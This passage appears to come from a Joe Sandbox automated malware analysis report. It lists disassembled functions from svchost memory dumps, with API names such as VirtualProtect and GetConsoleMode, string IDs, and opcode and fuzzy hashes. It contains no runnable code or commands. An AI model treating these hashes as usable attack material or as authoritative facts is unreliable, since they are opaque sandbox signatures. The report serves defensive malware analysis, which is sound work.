                                                                      • Instruction ID: 3419e39d5dfc8618c6cb42f13176a5100fc5763297956d13e738e13f4def0ff4
                                                                      • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                                      • Instruction Fuzzy Hash: 1051F636215E058BE726DF9AE460E9A73E2F399B84F044128DD4AA3F54DF78C845DB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 2882836952-0
                                                                      • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                                      • Instruction ID: 8b1623c9a997c05870e75cae67668f9ea54e0202be8e43d5c9b55d9289c29d55
                                                                      • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                                      • Instruction Fuzzy Hash: 2161C836229B40C7E761CBD5E4613AAB7E2F388748F500115FA8DA3BA8DB7CD549DB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 2882836952-0
                                                                      • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                                      • Instruction ID: 4d71cc3e8c28c4a99451ce990ba2a57135bd39b0a39f47405538629a8d43bfe2
                                                                      • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                                      • Instruction Fuzzy Hash: DA61D97652AE48C6E761DB99E46035AB7E6F388744F100215FA8EA3FA8DB7CC540CF40
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                      • String ID:
                                                                      • API String ID: 1092925422-0
                                                                      • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                                      • Instruction ID: 181deb5af24db71487740a702734a9885fa1e3cdadad012e8771009305f1b826
                                                                      • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                                      • Instruction Fuzzy Hash: 4E115136B18B4083EB66DBA1E41439D77B2F785B80F040026EE4D63754EB7DD549D781
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                      • String ID:
                                                                      • API String ID: 1092925422-0
                                                                      • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                                      • Instruction ID: d6e6c87c07e18ba0bfce4eac5e3abc533af6eca957da19e2ae1cfdecc773412f
                                                                      • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                                      • Instruction Fuzzy Hash: 6B118236605B4483FB258B65E41428A67F1FB46B80F040426DE4D53BA8EBBDC984C790
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                      • String ID: csm
                                                                      • API String ID: 2395640692-1018135373
                                                                      • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                      • Instruction ID: ddf1d67b6abdcfd21630125507b16972c9ca43dbfd4026023b7f6bef278932f7
                                                                      • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                      • Instruction Fuzzy Hash: B751A032311B00CADB56CBE9E469BBCB7D3E354B88F148121DA4A57788DB79E84AD700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                      • String ID: csm
                                                                      • API String ID: 2395640692-1018135373
                                                                      • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                      • Instruction ID: c21b00fe6cdef15fa98b7eeb5f0993215e0ce655c9d121a96d82298fb6486740
                                                                      • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                      • Instruction Fuzzy Hash: B951D632312E048ADB5ACF9DE464BED7BD3F354B98F144161DA5A97B88EB78D841C700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                      • Instruction ID: 10741a88c2dc58106a4ef11c8ab453dcffef895e7401875467749c3909827ec7
                                                                      • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                      • Instruction Fuzzy Hash: EE51CE32300F808BEB76CFE190663A877E2F354B94F544116DA8967B95CB38E49EE700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CallEncodePointerTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3544855599-2084237596
                                                                      • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                      • Instruction ID: 6d126233387588a9d511bf4a922610e9b0cb6977851d1ce647f370eaa07a4bb7
                                                                      • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                      • Instruction Fuzzy Hash: 3261AE72608FC485DB32CF95E4513EAB7E1F785B94F044215EB9923B95DB78D099CB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CallEncodePointerTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3544855599-2084237596
                                                                      • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                      • Instruction ID: bb062c9c1765dcf9e58b75b697d660edbab0bd9550349e412ca49f081f98f7f1
                                                                      • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                      • Instruction Fuzzy Hash: 2E619F72505FC886EB328F59E4517DABBE1F785B98F044215EB9863B99DB78C190CB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                      • Instruction ID: 3764e295dae51436190c53ee2acce7a6f14555dac3af3dabbcb84ae50abe31cc
                                                                      • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                      • Instruction Fuzzy Hash: 5351A532101B888BEB768F99D5643D87BE2F355B98F144116EA89E7FD5CB39C450CB01
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000003.2166828055.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_3_195dd590000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                      • Instruction ID: af73907501829587e655eeb5389c7aee1a7da3a0afcfc989cf125ffa9d2d8bfb
                                                                      • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                      • Instruction Fuzzy Hash: DE51DF32200B80CAEB768FA1D164398B7E6F355B95F145116DB8967FD5CB3AC490CF01
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                      • String ID: pid_
                                                                      • API String ID: 517849248-4147670505
                                                                      • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                                      • Instruction ID: c8fb80237bfc33b73c85fd3995de16dad7fef7cca13a6044f95ba4fbf0e2270b
                                                                      • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                                      • Instruction Fuzzy Hash: B3118731310F9191EB13DBE5E8223EE62E6F795780F8440259E49E3794EF68E90ED700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                      • String ID: pid_
                                                                      • API String ID: 517849248-4147670505
                                                                      • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                                      • Instruction ID: 61ed0a467d52f15948061a26027edb96aad001ca45d9e63bb8c13d5b37f8608f
                                                                      • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                                      • Instruction Fuzzy Hash: 50119331311F8992FB129BA9EC203DA63E6F748780F804425AE4AE3FD4EF68C955C700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                      • String ID:
                                                                      • API String ID: 2718003287-0
                                                                      • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                                      • Instruction ID: 31948b74c075dbed69a21029e0dc2a84cdf6468006f436d74313c9b7727a3dbf
                                                                      • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                                      • Instruction Fuzzy Hash: EBD1CF32B14B8489E712CFE5D4502EC3BB2F396B99F504216DE6DABB99DA34D10ED340
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                      • String ID:
                                                                      • API String ID: 2718003287-0
                                                                      • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                                      • Instruction ID: 472e025cdd6ef7e503bc2a2dcd81ee18ef5c8e76ab51aef6eb20d1c8849fb58d
                                                                      • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                                      • Instruction Fuzzy Hash: B6D1CB32715A848AE712CFAAD460ADC37F2F395B98F844216DE5EA7F99DA34C106C350
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Free
                                                                      • String ID:
                                                                      • API String ID: 3168794593-0
                                                                      • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                                      • Instruction ID: 34ba647b417854545887cb3649267efbc127a782600c2e3c08be315bc81a3ee6
                                                                      • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                                      • Instruction Fuzzy Hash: 8F013232710F809AE716DFA6A81429977E7F789F81F094029DB4963728DF38E096C740
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Free
                                                                      • String ID:
                                                                      • API String ID: 3168794593-0
                                                                      • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                                      • Instruction ID: 6f7721837b1bf4a809e33c9f74030b0cf998fba60b4ac646c8e75c6cb299eb4a
                                                                      • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                                      • Instruction Fuzzy Hash: E5016932610F80DAE715DFA6E8145897BE2F789F80B094025DF9A63B28DF34D051C740
                                                                      APIs
                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000195DE1B28DF), ref: 00000195DE1B2A12
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleMode
                                                                      • String ID:
                                                                      • API String ID: 4145635619-0
                                                                      • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                                      • Instruction ID: 02965a8b8e668252ed54d2dee24e17265d01d4e6d2b95822cbf3c9cfbbd9287c
                                                                      • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                                      • Instruction Fuzzy Hash: 2C91D032710E5089FB629FE594603ED2BE6F396B89F444106DE5A77A85DB34E48EE300
                                                                      APIs
                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000195DD5D28DF), ref: 00000195DD5D2A12
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleMode
                                                                      • String ID:
                                                                      • API String ID: 4145635619-0
                                                                      • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                                      • Instruction ID: c754ab53e5f4cf025cc88317a85fcba86c6cffdacda0aa9b1f1f469b1c2d2795
                                                                      • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                                      • Instruction Fuzzy Hash: AA91EF32710E5199FB62CFA69860BED2BE2F355B88F44410ADE4A77F85DA74C486C320
                                                                      APIs
                                                                      Memory Dump Source
